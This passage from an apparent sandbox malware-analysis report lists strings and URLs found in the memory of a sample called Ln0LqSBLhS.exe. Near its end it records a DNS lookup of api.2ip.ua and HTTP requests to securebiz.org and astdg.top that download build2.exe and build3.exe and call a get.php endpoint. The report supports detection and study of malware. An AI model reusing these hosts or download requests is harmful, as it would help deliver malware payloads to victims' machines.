                  Source: Ln0LqSBLhS.exe, 00000006.00000003.285900646.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1001175813/?random
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.290389600.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.285871930.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/viewthroughconversion/978707571/?random
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://hangouts.google.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa?ver=adbf
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.285280652.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286144680.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://itunes.apple.com/us/app/chrome/id535886823
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306327466.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306327466.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settings
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306960917.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://meet.google.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286478907.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://modernizr.com/download/?-eventlistener-picture-printshiv-setclasses
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306960917.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://networktraversal.googleapis.com/v1alpha
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.278691677.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.086.0502.0006/OneDriveSetup.exe
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274108803.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.114.0607.0002/Microsoft.OneDriveSyncClient_8wekyb3d8bbwe.msix
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277846655.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.274108803.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.114.0607.0002/OneDriveSetup.exe
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274108803.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/Microsoft.OneDriveSyncClient_8wekyb3d8bbwe.msix
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274108803.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/OneDriveSetup.exe
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/en-us/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://outlook.live.com/owa/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.286325981.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286144680.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=com.android.chrome
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286144680.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=com.chrome.beta
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286144680.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=com.chrome.canary
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286144680.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=com.chrome.dev
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.emmx&referrer=utm_source%3DAnaheimUpsell
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.291690634.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/cms/api/am/videofiledata/RE4sQBc-enus?ver=f959
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.291690634.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/cms/api/am/videofiledata/RE4sQBc-tscriptenus?v
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://products.office.com/en-us/academic/compare-office-365-education-plans
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277642079.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286478907.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://scottjehl.github.io/picturefill/
                  Source: Ln0LqSBLhS.exe, 00000003.00000002.241460701.00000000007B9000.00000004.00000020.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000003.251012559.000000000089F000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.285926599.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://services.google.com/sitestats/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287674072.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://stats.g.doubleclick.net/j/collect
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.329392428.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306610590.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chromecast/answer/2998456
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.329392428.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306610590.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chromecast/troubleshooter/2995236
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286144680.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://testflight.apple.com/join/LPQmtkUs
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/microsoftedge
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.359018581.00000000008BE000.00000004.00000001.sdmpString found in binary or memory: https://we.tl/t-VCW326HO
                  Source: Ln0LqSBLhS.exe, 00000006.00000002.360453971.00000000008BA000.00000004.00000001.sdmpString found in binary or memory: https://we.tl/t-VCW326HODa
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286325981.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287674072.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287674072.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.%/ads/ga-audiences
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.286325981.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.284670300.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.285900646.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.285871930.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277558843.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.290389600.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.285900646.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.285871930.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowse
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=02Google
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/zGoogle
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277558843.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/favicon.ico~
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.284670300.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_pk/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.284670300.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_pk/chrome/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/pagead/conversion_async.js
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306650314.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/tools/feedback
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286325981.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/travel/flights/click/conversion/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/1001260484/?label=wd2KCIzFhwIQxIu43QM&guid=ON
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/1003091418/?label=_ScJCKaZjAMQ2uun3gM&guid=ON
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/1015076955/?label=pLYsCO2WpwIQ27CD5AM&guid=ON
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/1025003162/?label=dS_pCN6C_AEQmp3h6AM&guid=ON
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/1025314660/?label=1y_ECPSQyQIQ5J706AM&guid=ON
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/1025757254/?label=jrhcCLLjowIQxqCP6QM&guid=ON
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/1053964783/?label=M-rHCLmqsgIQ7_PI9gM&guid=ON
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/953434019/?label=S5ObCKXEswMQo__QxgM&guid=ON&
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/978140452/?label=BLTWCIya2wIQpPq00gM&guid=ON&
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/978707571/?label=OIrMCPWrzAIQ88jX0gM&guid=ON&
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/981988373/?label=dqsDCKOv2AIQleif1AM&guid=ON&
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/991916218/?label=-vZjCNbavwIQuuH92AM&guid=ON&
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/991916218/?label=P8xDCObZgQIQuuH92AM&guid=ON&
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/991916218/?label=lnxHCN7agQIQuuH92AM&guid=ON&
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/993349747/?label=X1hnCM2JpQMQ86DV2QM&guid=ON&
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion/998498652/?value=1&label=UKCtCITsswMQ3MKP3AM&
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetings
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306960917.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/calendar/v3
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306960917.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/hangouts/v1
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287674072.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286325981.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.googletraveladservices.com/travel/clk/pagead/conversion/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306518235.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/hangouts_echo_detector/release/%
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoftedgeinsider.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.onenote.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.skype.com/en/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.288850523.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.xbox.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.290651840.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/iframe_api
                  Source: unknownDNS traffic detected: queries for: api.2ip.ua
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_0040CF10
                  Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: securebiz.org
                  Source: global trafficHTTP traffic detected: GET /fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: astdg.top
                  Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: astdg.top
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: <a itemprop="sameAs" target="_blank" aria-label="Follow this page on Facebook" href="https://www.facebook.com/microsoftedge"> equals www.facebook.com (Facebook)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.304623285.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: "origin": "http://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.304623285.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: "web_url": "http://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: <html lang="en-us" class="no-js" dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> equals www.facebook.com (Facebook)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: F.pe)){K("https://www.youtube.com/iframe_api");v=!0;break}})}}else H(w.vtp_gtmOnSuccess)}var t=["www.youtube.com","www.youtube-nocookie.com"],q={UNSTARTED:-1,ENDED:0,PLAYING:1,PAUSED:2,BUFFERING:3,CUED:5},u,v=!1;Z.__ytl=n;Z.__ytl.b="ytl";Z.__ytl.g=!0;Z.__ytl.priorityOverride=0}(); equals www.youtube.com (Youtube)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254486137.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254618926.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254653052.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
